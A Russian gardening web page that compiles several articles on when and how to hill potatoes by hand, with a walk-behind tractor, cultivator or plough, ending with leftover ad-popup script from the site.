183 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Как окучивать картофель вручную

Окучивание картофеля: сроки, правила, когда и как окучивать

Уход за сельскохозяйственными культурами, при котором землю приваливают к основанию растений — называют окучивание. У основания кустов образуются рыхлые земляные насыпи, в виде холмиков. Производят окучку вручную – тяпкой, мотыгой, дисковым окучником, плугом или при помощи конной или тракторной тяги – мотоблоком, культиватором.

Зачем окучивать картофель

Окучивание картофеля является экологически чистой заменой гербицидов. Для картошки почва должна быть легкой и рыхлой. Смысл окучивания в том, чтобы появились боковые корешки, на которых будут формироваться клубни. Присыпание земли предотвращает рост сорняков. Новую траву гораздо легче вырвать из рыхлого грунта. Рыхление почвы дает доступ кислорода и влаги к корням растений.

Часто разросшиеся кусты начинают разваливаться в разные стороны, здесь приходит на помощь присыпание почвы. При этом кусты собирают, формируют аккуратные кустики, клубни не оголяются. Насыпь земли накапливает за день тепло, в ночные часы не дает кустикам замерзнуть.

Почему приваливают картошку:

  • интенсивнее растут и развиваются растения;
  • меньше вымывается питательных веществ из грунта;
  • у окученного картофеля урожай на 20-30% выше;
  • растения более устойчивые к ветрам и засухам;
  • легче выкапывать картофель из почвы;
  • меньше вырастает зеленых клубней;
  • минимум сорной травы;
  • хороший доступ воздуха и воды к корневищу;
  • фотосинтез происходит быстрее.

Всегда ли нужно окучивать картофель

Есть мнение, что окучивание подходит только для северных регионов страны и для влажного грунта. Для степных районов процедура малоэффективна. В таких областях добиться результатов помогает глубокая посадка.

Можно не окучивать овощи вообще, картофельные корни глубоко уходят в землю и растения вполне способны обойтись без приваливания. Однако столоны могут расти и вверх, в этом случае без окучки не обойтись. В рыхлом холмике формируются дополнительные клубни, повышается урожайность. Картофель дает урожай во влажной и рыхлой земле. Почву рыхлят на второй день после дождливой погоды.

Существует технология взращивания корнеплодов без окучки, для этого грядки накрывают соломой, черным нетканым материалом, картофель сажают прямо в сидераты. При разокучивании ботву не поднимают вверх, а расстилают по земле. Овощеводы доказали, что такой способ посадки не менее эффективен, чем при окучивании традиционным методом.

Когда и сколько раз нужно окучивать картофель

Дата высадки клубней зависит от погоды, выбранного сорта, района произрастания. Сроки окучивания картофеля каждый огородник выбирает сам. Он смотрит на состояние своих грядок и решает, когда лучше заняться мотыжением овощей. В средней полосе и северных регионах окучивание проводят сразу после посадки клубней. Приваливание делают с целью уберечь саженцы от ночных заморозков. Окучивают картофель за лето 2-3 раза.

Примерное время проведения окучки:

  • окучивать картофель первый раз надо, когда кустики вырастают 15-20 см в длину;
  • второй раз присыпают землю через 15-20 дней после первого раза;
  • третью окучку делают через месяц после второй процедуры, обычно два раза достаточно.

Окучить кусты необходимо вечером или утром, чтобы не было солнцепека. Работы проходят легче, прохлада уберегают растения от увядания.

Рекомендации как правильно окучивать картофель

Картошка любит дышать, поэтому сажать глубоко ее не стоит. При легком грунте заделка 8 см, при плотном – 5 см. Окучку и прополку проводят в одно время, так удобно. Удаляют крупные сорняки, которые затеняют кусты. Мелкая травка погибает сама после рыхления земли. Земляную насыпь делают высотой 10-30 см, в зависимости от высоты кустиков.

  1. После окучки нельзя поливать растения из шланга, земляная куча может «поплыть», работа будет сделана зря.
  2. В сухую погоду перед рыхлением увлажняют землю, а затем окучивают грядки.
  3. После затяжного дождливого летнего периода выжидают 2-3 дня, чтобы земля просохла, затем проводят окучку.
  4. Картофель в дождливое лето не окучивают.
  5. Если окучивать картофель во время цветения, то растения могут сбросить бутоны.

Чем окучивать картофель: способы и инструменты

На дачном участке площадью 2-3 сотки картошку рыхлят при помощи тяпки. Если площадь посадки большая, то обработка вручную слишком трудоемкий процесс. Дачники пользуются мотоблоком, дисковым окучником, культиватором или плугом.

Окучивания картофеля вручную тяпкой (мотыгой)

Чтобы не получить солнечный удар и не навредить растениям рыхлят землю с утра, после дождя или полива. Тяпка для окучивания картофеля бывает треугольной или трапециевидной формы.

Традиционный способ

Обработка почвы мотыгой остается традиционным методом для возделывания малогабаритных участков. Чтобы окучивать картошку вручную нужна тяпка, выбирают не жаркий день после дождя.

  • между рядками подкапывают тяпкой почву;
  • огребать землю надо в одном направлении;
  • почву сгребают к одной стороне кустиков, потом с другой стороны делают эту работу в обратном направлении;
  • получается высокая и широкая насыпь, на вершине холмика торчат стебли кустов;
  • в конце гряд делают углубление для скопления дождевой воды.

Веерный метод

Веерный способ приваливания применяют, когда кустики вырастают до 20 см высотой. Для такого метода подходит лопата, а не тяпка. Способ значительно увеличивает урожайность.

  • стебли осторожно раздвигают и раскладывают по земле в разные стороны;
  • лопаткой набирают грунт и насыпают в средину куста;
  • землю накидывают так, чтобы на поверхности оставались верхушки с листиками;
  • на насыпь кладут солому, сухую траву;
  • через пару дней ветки направят рост вверх;
  • через 15 суток куст вытянется и разрастется, сформирует новые побеги.

Окучивание по Замяткину (аналогичный предыдущему)

Замяткин – овощевод из Сибири предложил свой метод окучивания картофеля. Он утверждал, что традиционное мотыжение снижает урожай. Внутри куста идет борьба за свет и влагу.

Окучка по Замяткину:

  • клубни сажают в шахматном порядке в промежутке 30-40 см;
  • когда саженцы подрастут 15-20 см стебли раздвигают в разные стороны;
  • в центр куста выкладывают солому, траву, листву, сверху остаются макушки растений;
  • урожай возрастает в 2 раза;

Под укрытием почва сохраняет влагу, земля не пересыхает, клубни не зеленеют. Листву не ест колорадский жук и не обжигает кусты солнце.

Мотоблок

При масштабной посадке картофеля нужен рациональный и комфортабельный способ – окучивание мотоблоком. Это дорогой аппарат, для которого нужно приобретать топливо. Но при больших плантациях посадок с его помощью можно быстро произвести обработку участка. На мотоблоке расположено спереди 2 рыхлителя и 1 плуг сзади.

Работать с аппаратом легко, время на обработку уходит гораздо меньше, чем если окучивать картофель тяпкой. Если расстояние между рядками не одинаковое, может произойти травмирование корневища.

Дисковый окучник

Окучник из дисков можно сделать самостоятельно. Он состоит из рукоятки, двух дисков и корешка. Наклон конструкции регулируется вручную. Лучший вариант, когда диски крепятся болтами, они регулируют ширину между дисками. Окучник способен обрабатывать сразу 2 грядки с одной стороны или одну гряду с двух сторон.

Ручным окучником обрабатываются междурядья различных овощных культур, не только картофеля. Ручные окучники устанавливают на трактор или мотоблок.

Культиватор

Существуют ручные (механические) культиваторы и автоматические. Ручной аппарат дешевле, но физическая нагрузка при работе гораздо больше, чем работа на автоматическом культиваторе. Аппараты бывают легкими, средними и тяжелыми, вес от 10 до 40 кг. Разница между приборами в глубине заделки от 25 до 80 см. Работают культиваторы на электричестве или бензине.

Кроме окучки культиваторы измельчают глыбы земли, роют борозды для посадки, пригодны для внесения песка или удобрений. С помощью аппарата собирают картошку.

Плуг – ручное приспособление, которое помогает окучивать картофель и другие овощи. Плуг может тянуть лошадь. Если приварить к нему колесо, то обрабатывать будет легче. У плуга окучник в виде лапы. Сваренный самостоятельно плуг выйдет гораздо дешевле, чем приобретенный в магазине.

  • компактность;
  • простота в использовании;
  • маневренность;
  • возможность рыхления одним человеком;
  • низкая цена.

Окучивание картофеля помогает увеличить урожайность как минимум на 30%. Процедура благотворно влияет на развитие картофельных кустов. Поступление кислорода к клубням помогает набирать массу, а листва становится пышной. В листве накапливается глюкоза, которая растворяется и переходит к корнеплодам. Это способствует накоплению крахмала. Автоматические приспособления для рыхления земли упрощают и облегчают работу человека. Окучка и рыхления картошки помогают вырастить вкусные и крупные клубни.

Правильное окучивание картофеля – сроки, инструменты и надо ли вообще

Добавление статьи в новую подборку

Проходитесь по картофельным бороздам тяпкой скорее по привычке или вообще не знаете, в чем цель окучивания картофеля? Давайте разберемся, нужно ли это делать, каков правильный подход и вырастет ли картофель без окучивания и прополки.

Казалось бы, какие могут быть сложности в окучивании картофеля? Взял в руки окучник, выбрал погожий денек и отправился в огород. На самом же деле, если вы хотите повысить урожай, а не лишиться его, стоит соблюдать ряд правил, грамотно выбирать время и инструмент для окучивания картофеля.

Зачем окучивать картофель

Картофель нуждается в окучивании больше других овощей. Эта трудоемкая и времязатратная процедура в среднем увеличивает урожайность картофельной плантации на 30%. Кроме того, хотя бы двукратное окучивание картофеля за сезон дает следующее:

  • борется с полеганием стеблей;
  • уменьшает количество зеленых клубней;
  • способствует формированию мощной, разветвленной корневой системы;
  • удерживает в прикорневой зоне воду и воздух;
  • снижает уровень вымывания питательных веществ из грунта.
  • Проводить окучивание картофеля нужно лишь в том случае, если у вас на участке глинистая или суглинистая почва. На песке это делать бессмысленно – вода и удобрения в жидкой форме будут скатываться и не попадут к корням.

    Как подготовить картофель к окучиванию

    Как правило, прополка и окучивание картофеля проводятся одновременно, однако можно и разнести эти работы по дням, если время позволяет. Редко кто пропалывает картофель до идеального состояния, обычно удаляют лишь крупные сорняки, способные затенять молодые кустики. А мелкая травка гибнет сама, так как в процессе окучивания ее корни повреждаются и она остается без питания.

    Существует и технология выращивания картофеля без окучивания и прополки. Для этого гряды накрывают соломой или сажают картошку прямо в сидераты.

    Многие дачники задаются вопросом, чем подкормить картофель перед окучиванием. Однако постановка его не совсем верна, ведь для получения максимального урожая подкармливать картофель нужно не один раз за лето, а хотя бы три, при этом чередуя корневые и внекорневые подкормки.

    Если же вы хотите совместить две этих полезных процедуры, то внесите удобрения с высоким содержанием азота. Например, на 1 кв.м картофельной гряды вылейте раствор из 20 г аммиачной селитры и 20 г сульфата калия на ведро воды. Также можно применить нитрофоску (50 г на 1 кв.м) или нитроаммофоску (30 г на 1 кв.м).

    Когда нужно окучивать картофель

    Конечно, точную дату и даже неделю вам никто не назовет – сроки окучивания картофеля зависят как от региона, в котором находится ваш участок, так и от погоды и даже выбранного сорта. Однако есть общие периоды в развитии этого овоща, которые не пропустит даже самый неопытный огородник.

    Первое окучивание картофеля проводят, как только из земли покажутся первые листья. Кустики должны достигнуть всего 7-10 см в высоту и можно приступать к процессу. Это окучивание спасет их от возвратных заморозков и стимулирует рост корневой системы. Второе окучивание картофеля желательно провести через 2 недели, а третье – еще через месяц. Если времени совсем мало, то второе окучивание можно пропустить.

    Во время цветения окучивать картофель нельзя – если не успели сделать это до раскрытия бутонов, лучше сделайте после или не делайте совсем.

    Приспособления для окучивания картофеля

    Большинство дачников по старинке окучивают картофель с помощью обычной тяпки, однако техника не стоит на месте и для тех, кто не хочет гнуть спину лишний раз, имеется несколько неплохих альтернатив.

    Окучивание картофеля мотоблоком

    Самый дорогой и комфортабельный способ это окучивание с помощью мотоблока. Конечно, покупка этой техники способна пробить брешь в бюджете среднестатистического дачника, ведь помимо стоимости самого мотоблока вам придется заплатить еще и за различные насадки на него.

    Кроме того, использование мотоблока требует строго выверенного, одинакового расстояния между рядами картофеля и повышает количество травмированных корнеплодов.

    Для проведения окучивания на мотоблок устанавливаются 2 рыхлителя спереди и 1 окучник сзади.

    Окучивание картофеля дисковым окучником

    В отличие от мотоблока, ручной окучиватель дешев, причем изготовить его можно и самостоятельно. По сути, это рукоятка, черенок и два отвала, расположение которых можно регулировать наклоном.

    С помощью ручного окучника можно обрабатывать междурядья не только на картофельных грядах, но и на любых других. Хотя само устройство не тяжело, окучивание им может утомить неподготовленного дачника.

    При каждом окучивании на куст подсыпают 5-10 см грунта.

    Окучивание картофеля культиватором

    Механические и автоматические культиваторы также довольно широко распространены на территории СНГ. Некоторые из них скорее рыхлят почву, другие же полноценно окучивают картофельные ряды.

    Независимо от того, придется ли вам тащить культиватор самому или это за вас сделает небольшой мотор, старайтесь отслеживать, насколько ровно вы это делаете, потому что «сбиться с курса» бывает очень просто.

    Плуг для окучивания картофеля

    Плуг – самый старый инструмент для окучивания картошки. Его могут тянуть как люди, так и лошади, а также он может крепиться к мотоблоку. Окучивание плугом хоть и результативно, безопасно для картошки и не требует финансовых затрат, все же довольно трудоемко и становится все менее популярно.

    Если вы все еще выбираете для этой дачной работы плуг, постарайтесь приобрести легкий экземпляр, поскольку старым тяжелым агрегатом обработать за день больше пары соток будет непросто.

    Тяпка для окучивания картофеля

    Окучивание картофеля вручную может выполняться как обычной лопатой, так и тяпкой или мотыгой. Независимо от того, какой формы выбранный вами инструмент, суть окучивания сводится к подгребанию на кусты земли из междурядий. Процесс этот является довольно трудоемким и с каждым следующим окучиванием занимает все больше времени.

    При ручном окучивании картофеля не стоит надеяться, что сорняки полягут сами собой – лучше пройтись по картофельным рядам и выдергать лишнюю траву заранее.

    А вы окучиваете картофель или обходитесь без этого?

    Как окучивать картофель: вручную, мотоблоком, сохой

    Окучивание картофеля — важнейший агроприем, улучшающий жизнь растений, сохраняющий влагу в почве, предохраняющий клубни от позеленения, насыщающий почву кислородом.

    Окучивание — важный агроприем при выращивании картофеля. Окучивание картофеля позволяет сохранить в почве больше влаги, клубни не зеленеют на солнце, а колорадские жуки и другие вредители повреждают картошку значительно меньше.

    Как окучивать картофель знают все, даже те, кто картошку никогда не выращивал (по рассказам утомленных огородников, показывающих мозолистые руки). Однако знание у каждого свое — сколько людей, столько и способов окучивания. Одни окучивают вручную тяпкой, другие вручную лопатой, третьи — вручную сохой, четвертые — окучивают сохой, которую тащит лошадь, ну а самые механизированные — окучивают мотоблоком. Мы не рассматриваем промышленные варианты окучивания — трактором, это отдельная тема для статьи.

    Как правильно окучивать картошку и какой способ проще и легче? Здесь нет однозначного ответа: для одних проще и быстрее окучить мотыгой, а другие без мотоблока даже из дома не выходят. У каждого огородника есть хитрости, которые позволяют облегчить труд при окучивании, поэтому рассмотрим, как можно больше вариантов.

    Окучивание картофеля вручную: мотыгой или лопатой

    При малой площади посадок картофеля окучивание вручную единственный разумный вариант окучивания картофеля. Не заводить же мотоблок из-за 200 кустов картошки. Достаточно найти немного свободного времени в хорошую погоду и за 1 час можно завершить работу, а заодно размять мышцы и подышать свежим воздухом.

    Сущность окучивания картофеля. Фото: atelieredboelaarts.nl

    Ручное окучивание хорошо тем, что огородник вынужден внимательно осматривать каждый куст на предмет повреждения вредителями и заболеваниями. Не секрет, что большинство проблем с картофелем выявляются именно при окучивании. Часто после окучивания огородник, немного отдохнув, берет опрыскиватель «Жук» и начинает опрыскивать ботву от жуков, либо бордоской смесью от фитофтороза.

    Опытные огородники интуитивно знают, когда начинать окучивание картофеля. Зоркому глазу достаточно посмотреть на картофельное поле, чтобы определить, что момент настал. Обычно в первый раз момент настает, когда длина побегов картофеля приближается к 20 см, а второй раз через две-три недели после первого окучивания.

    Да, требуется минимум два окучивания за вегетационный период. Некоторые окучивают три-четыре раза, все зависит от местных условий, сорта картофеля и характеристики почвы. Кстати, первое окучивание обычно заменяет прополку — рука сама собой тянется выдернуть из почвы сорняки, поэтому окучивание обычно затягивается за счет наклонов туловища для прополки.

    При ранней посадке картофеля в мае, для получения сверхраннего урожая, окучивание позволяет защитить картофельные всходы от возвратных заморозков, а также ускоряют рост растений при недостатке тепла. Дело в том, что кучи почвы вокруг растений аккумулируют тепло солнца днём, а ночью мешают злым заморозкам повредить нежные всходы, а также стимулируют рост, ускоряя развитие.

    Окучивать картофель тяпкой проще утром или вечером, когда солнце еще не печет. Прохлада не только облегчает работу огороднику, но и предохраняет растения от увядания, в случае незначительного повреждения корневой системы при окучивании. Не стоит окучивать картошку в жару, сами намаетесь, да и растения замучаете.

    Легче всего подгребать почву к корням картофеля после небольшого дождя, когда почва немного просохнет — меньше пыли, больше закрытие влаги, лучше вентиляция корней. Если стоит длительная засуха, то перед окучиванием стоит полить картофель из шланга или из лейки, а уж затем окучивать.

    Результатом правильного окучивания картофеля обычно являются гряды, высотой

    Окучивание картофеля лошадью, сохой

    Во многих регионах Центральной России еще не перевелись мастера по окучиванию картофеля сохой, которую тянет лошадь. Сроки окучивания картофеля лошадью те же, что и при ручном окучивании, но есть одна особенность.

    Дело в том, что максимальная эффективность окучивания картофеля лошадью будет достигнута тогда, когда сам картофель был посажен «под соху», то есть при посадке применялась соха, которой делали борозды. Лошади, которые тянут соху обычно приучены ходить по междурядьям.

    Но, как говорится, лучше один раз увидеть, чем сто раз прочитать. Поэтому рекомендую посмотреть видео про окучивание картофеля сохой:

    Окучивание картофеля мотоблоком

    Когда площадь посадки картофеля значительная, да и сам картофель был посажен ровно, с одинаковыми расстояниями между рядками, то логично применение мотоблока для окучивания картофеля.

    В наше время даже если нет собственного мотоблока, всегда можно пригласить специалиста со своим мотоблоком для окучивания картофеля. Услуга стоит не дороже денег, а времени экономит вагон, главное правильно посадить картошку, чтобы мотоблок мог окучивать растения без повреждений.

    Эффективность и скорость окучивания мотоблоком чуть ниже, чем при окучивании лошадью, но мотоблок значительно более маневренный и занимает меньше сил у человека. Рекомендую посмотреть видео про окучивание картошки мотоблоком:

    Как обойтись без окучивания картошки

    Многие дачники и огородники выращивают картофель без утомительного окучивания: сажают картошку под агроспан (нетканый материал, продается в магазинах), под солому, под сено и т.д.

    Общее у всех методов одно: на поверхности почвы остается лишь стебель с листьями, а корневая система защищена от солнечных лучей и усиленного испарения влаги укрытием, которое заменяет защитную функцию почвы, подгребаемой к корням при окучивании.

    Некоторые умельцы вообще применяют разокучивание, расстилая ботву картофеля по земле и присыпают ее травой, сеном, соломой, почвой и др., оставляя на поверхности укрытия листья.

    Способ спорный, да и экономия сил и времени по сравнению с обычным окучиванием картофеля, незначительная.

    Когда, чем и как окучивать картофель?

    Окучивание картофеля необходимо для достижения хорошего и здорового урожая. Опытные дачники утверждают, что раннее присыпание нижней части кустов почвой способно заменить прополку и рыхление земли. Еще одно важное достоинство окучивания – борьба с сорными растениями и защита клубней от действия солнечных лучей и колебаний температуры.

    Необходимость процедуры

    Окучивание картофеля – важный этап выращивания этой пасленовой культуры. Суть процедуры заключается в присыпании нижней части кустов мягкой взрыхленной землей. Такое занятие считают экологически чистой заменой гербицидов. Кроме того, оно на 30% повышает урожайность.

    Картофель нуждается в окучивании гораздо больше, чем другие овощи.

    Присыпать нижние части растения взрыхленной почвой нужно для того, чтобы:

    • снизить вымывание питательных веществ из грунта;
    • ускорить рост побегов;
    • улучшить освещение кустов;
    • защитить растения от высыхания;
    • улучшить аэрацию почвы;
    • защитить кусты от вредителей;
    • защитить клубни от ультрафиолетовых лучей, а также резких перепадов температур;
    • предотвратить рост сорняков;
    • создать дополнительное пространство для растений;
    • повысить устойчивость растений к ветрам и весенним заморозкам.

    Почему окучивание способствует повышению урожайности? У картофеля есть боковые побеги – столоны, которые располагаются ниже уровня почвы. Они развиваются быстро и так же быстро отмирают. На боковых побегах образуются другие отростки, которые и представляют собой клубни.

    При окучивании эти молодые побеги оказываются под грунтом, поэтому растение вынуждено давать новые ростки. Благодаря этому появляются новые корни и клубни, а влага сохраняется. Кроме того, формируется сильная корневая система, которая развивается и образует мощную листовую массу.

    Окучивание картофеля даст эффект только в том случае, если на участке суглинистая или глинистая почва. Если культура растет на почве с песком, то в любом случае жидкие удобрения и вода будут скатываться и не проникнут к корневой системе.

    Когда окучивание не требуется?

    Подобная процедура требуется не во всех случаях. Воздержаться от нее нужно в следующих случаях:

    • если держатся высокие температуры, причем температура грунта достигает 26 градусов, а также если в почве мало влаги и нет хорошей системы орошения – при таких условиях окучивание только навредит;
    • если картофель высаживался под черный укрывной нетканый материал.

    Чтобы определить, подходит ли способ окучивания в каждом конкретном случае, рекомендуется провести такой опыт: половину грядки с кустами картофеля окучить, а вторую часть только разрыхлить и понаблюдать за результатом.

    Инструменты для окучивания картофеля

    Процедуру можно осуществлять при помощи разных инструментов.

    Тяпка или лопата

    Окучивать картофель такими инструментами наиболее тяжело. Они обязательно должны иметь заточенный край и широкую рабочую поверхность.

    С помощью тяпки окучивание производят таким образом: вначале обрабатывают ряд с одной стороны, затем переходят на другую. В конце каждого делают небольшую насыпь для того, чтобы в междурядье осталась влага.

    Процесс окучивания при помощи лопаты показан в этом видео:

    Ручной механический окучник

    Приобрести его можно в садоводческих магазинах. Устройство состоит из двух металлических дисков, направленных по отношению друг к другу под углом.

    Чтобы окучивать им картофель, нужно включить в процесс 2 человека: один из них будет тянуть механизм, а второй – надавливать на него и направлять. Процесс окучивания прост и экономит время. За один проход можно обработать целый ряд с картофельными кустами.

    Как усовершенствовать ручной окучник и облегчить процесс с помощью мотолебедки, показано в этом видео:

    Мотоблок

    Этот аппарат стоит недешево, но при выращивании картофеля в больших масштабах без него не обойтись. Мотоблок значительно упрощает работу и экономит время огородника.

    Принцип действия устройства заключается в том, что впереди идут колеса или фреза, которые рыхлят грунт, а сзади размещается плуг, который набрасывает на нижнюю часть кустов почву.

    Использовать мотоблок можно только в том случае, если между рядами картофельных кустов одинаковое расстояние – в противном случае существует высокий риск повреждения клубней.

    Смотрите видео, как окучивать картошку мотоблоком:

    Ручной плуг

    С помощью этого инструмента можно обработать по одной стороне каждого соседнего ряда за один проход по междурядью. Состоит плуг из рамы, к которой крепятся нож, колесо и тяга.

    При обработке земельного участка огородник толкает конструкцию, благодаря чему плуг разрезает землю. Боковые лопасти распределяют взрыхленную почву на прикорневую часть кустов картофеля.

    Процесс окучивания картошки с помощью ручного плуга с дополнительным грузом показан в этом ролике:

    Автоматический или механический культиватор

    Они стоят дешевле мотоблока, а их конструкция более проста. Устройства используют на небольших участках с легким грунтом.

    Принцип работы заключается в следующем: вначале при помощи фрезы рыхлят грунт, затем фрезу меняют на плуг и проводят окучивание.

    Выбирая инструмент для окучивания картофельных кустов, нужно ориентироваться на тип почвы на участке, а также на его площадь.

    Когда и сколько раз окучивать картофель?

    Решив окучивать картофель в целях повышения урожайности, нужно учесть, что начинать этот процесс нужно в определенное время.

    Первую процедуру рекомендуется проводить тогда, когда высота стеблей достигнет 14-20 см. Раннее окучивание заменит прополку и рыхление. Кроме того, ростки, прикрытые почвой, перенесут снижение температуры, что обычно наблюдается во второй половине мая.

    Окучивание после дождя позволит максимально сохранить влагу и стимулировать образование боковых побегов. В случае жаркого лета без дождей рекомендуется окучивать кусты после полива.

    Лучше всего выполнять эту сельскохозяйственную процедуру после дождя, когда грунт слегка просохнет. В жаркий день окучивать картофель не стоит: почва будет полностью сухой, к тому же при таких условиях легко травмировать растение. При высоких температурах воздуха культура особенно тяжело воспринимает повреждения.

    Классическая технология предусматривает две процедуры окучивания за весь период развития картофеля. Если первая из них проводится после появления всходов, то вторая – через 2-3 недели, когда на кустах появятся цветочки. Это наиболее важное время для окучивания, так как в этот период на столонах образуются небольшие клубни.

    Если для подсыпания земли на нижнюю часть кустов используется мотоблок и культиватор, то окучивание проводят один раз за сезон, в период цветения.

    Если первое окучивание проводилось очень рано, то в дальнейшем потребуется еще 2-3 повторения.

    Технология правильного окучивания

    Соблюдение технологии окучивания – залог повышения урожайности. При неправильном подходе можно травмировать культуру и только навредить растению.

    Если картофель выравнивают вручную с помощью простых орудий – например, тяпки – нужно следовать таким правилам:

    • Предварительно удалить все сорняки. Траву можно оставить на земле: когда она высохнет, то станет защитой от солнечных лучей для кустов.
    • Каждый куст отдельно присыпать почвой из междурядий со всех сторон. Вокруг растения создается возвышение.
    • При выполнении работы нужно действовать аккуратно, чтобы не повредить корневую систему картофеля.

    Традиционное окучивание выглядит таким образом:

    1. Пространство между бороздами подкапывается плоскорезом.
    2. Грядки окучиваются в одном направлении. Огородник, продвигаясь вдоль грядок, подгребает почву с междурядья к одной стороне кустов.
    3. Грядки окучиваются с другой, еще не охваченной, стороны. С междурядья землю подгребают к другой стороне.
    4. Грунт к кусту подгребается тяпкой со всех сторон. В результате должен образоваться холмик, широкий и высокий, из которого виднеется букет стеблей.
    5. В конце каждого ряда насыпают подобие дамбы: это сооружение задержит влагу после дождей или полива.

    Если окучивание выполняется с помощью лопаты, то прокапывают междурядья на одну треть лезвия лопаты и присыпают картофельные кусты почвой.

    Еще один способ окучивания – веерный. Такой метод можно использовать, когда стебли вырастут на 15-20 см. Для веерного способа лучше использовать лопату. Процедура выполняется таким образом:

    1. Руками раздвигают стебли, раскладывают их на земле веером, в разные стороны.
    2. Лопатой берут почву с междурядья и сыплют прямо в центр куста.
    3. Землю распределяют таким образом, чтобы наверху остались только верхушки.
    4. Сверху накидывают сорняки, выполотые с междурядий. Делать это нужно для того, чтобы задержать в почве влагу. Кроме того, выполотые сухие сорняки служат дополнительной подкормкой.

    Огородники делятся хитростями, которые позволят сделать окучивание действительно полезным и качественным. Стоит обратить внимание на такие рекомендации:

    • если первое окучивание проводится по достижению кустами высоты в 15-20 см, то насыпь земли должна быть не менее 15-18 см;
    • второе окучивание, когда кусты достигнут высоты 25-30 см, должно осуществляться таким образом, чтобы насыпь достигала 17-20 см;
    • окучивать кусты следует не позже 10 часов утром либо в вечернее время, после 6 часов.

    Окучивание картофеля позволит повысить его урожайность и защитить от ранних колебаний температуры, а также от действия ультрафиолетовых лучей. Эту сельскохозяйственную процедуру проводят с помощью тяпки, лопаты, культиватора или мотоблока. Выбор орудия труда зависит от масштабов участка, засаженного картофелем.

    Как окучивать картофель вручную

    Выращивание картофеля предполагает посадку, уход и сбор урожая. Окучивание картофеля вручную, специальным приспособлением или мотоблоком — один из важных процессов ухода за культурой. Выбор метода зависит от размеров участка.

    Окучивание картофеля вручную

    Цель операции

    Окучивание картошки проводят для повышения урожайности путем защиты кустов и клубней от плохой погоды. Во время проведения операции грунт рыхлят, что позволяет насытить корни кислородом и влагой.

    При появлении клубней плоды находятся близко к поверхности, что приводит к их запеканию под солнцем или обморожению при ночном понижении температуры. Окучивание картофеля позволяет защитить картофель.

    Эффект от окучивания:

    • защита растения от плохих погодных условий;
    • увеличение количества клубней;
    • предотвращение появления вредителей;
    • формирование кустов, не затеняющих остальные;
    • укрепление стеблей.

    Правила выполнения

    Окучивать следует по таким правилам:

    • Первую операцию проводят при появлении ростков высотой 8-12 см. В холодном климате кусты покрывают землей полностью, чтобы защитить молодые растения от мороза. В теплом климате окучивание картошки проводят позже.
    • Второй раз окучивать требуется при образовании клубней. Важно сделать это перед цветением. Подходящий период наступает через 14-20 дней после первой процедуры.
    • Последний раз окучивать лучше, когда кусты достигнут высоты 23-26 см. Основу посыпают землей. Также грунт раскидывают между ветвями, чтобы они росли шире.

    Процедуру проводят на влажной земле в прохладное время суток. Идеальный вариант — утро или вечер после дождя. Это приносит картошке дополнительную влагу при окучивании. При появлении цветков процедуру проводят осторожно, чтобы не повредить клубни в период завязывания.

    Операцию при сухом грунте не совершают: это затрудняет развитие растение и делает его уязвимым для вредителей.

    Ручное окучивание

    Существует 2 способа ручного окучивания

    • Подгребание. Из земли формируют холмик возле основы куста, чтобы стебли росли вверх.
    • Помещение земли внутрь куста. Перед тем как кидать грунт, стебли растопыривают, чтобы после окучивания они зафиксировались и росли в разные стороны.

    Вручную операцию проводят с помощью мотыги и лопаты. Использование таких ручных инструментов рационально только на маленьких участках.

    Окучивание помогает защитить корневую систему

    При использовании мотыги землю тянут к кусту, чтобы получилось небольшое возвышение. Лопатой грунт просто кидают к основанию растения. Получившийся холмик должен быть высоким и широким, чтобы вся корневая система и основание растения были защищены.

    Использование ручного приспособления

    Окучивать картошку ручной сохой быстрее и эффективнее. Преимуществами приспособления является маневренность, простота конструкции и универсальность. Окучник модернизируют для нарезания борозд при посадке и в инструмент для межрядной обработки.

    Конструкция состоит из рамы, рабочего органа и отвалов для регулировки глубины обработки. Для использования требуется 1 человек, который приводит приспособление в работу и следит за направлением.

    Существует 2 вида ручных окучников:

    • рабочий орган в виде плуга;
    • дисковый.

    При использовании ручного окучника картошка должна быть посажена в ровный ряд. Для этого лучше использовать маркер при нарезании борозд. При движении рабочий орган подрезает грунт в междурядьях и раскидывает его в стороны на кусты. Чтобы избежать риска повреждения плодов, необходимо точно выставить угол атаки и вести окучник ровно.

    Изготовление ручного окучника

    Для снижения стоимости выполнения ухода за картофелем окучники собирают своими руками.

    Положительные стороны окучника, собранного своими руками:

    • дешевизна;
    • возможность изготовления, исходя из личных предпочтений;
    • подстройка под тип грунта;
    • возможность модернизации под другие цели.

    Минусом является отсутствие гарантии качества. Заводские окучники для картофеля производят по стандартам, а качество домашних зависит только от изготовителя и материалов.

    Для изготовления ручного окучника понадобится:

    • пустая внутри дюймовая труба длиной 1 м;
    • тонкая труба для изготовления тяги и перемычек;
    • стальная пластина толщиной 1 мм для отвалов;
    • паяльная мала для сгибания металла;
    • талреп;
    • пила с диском по металлу;
    • сварочный аппарат.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
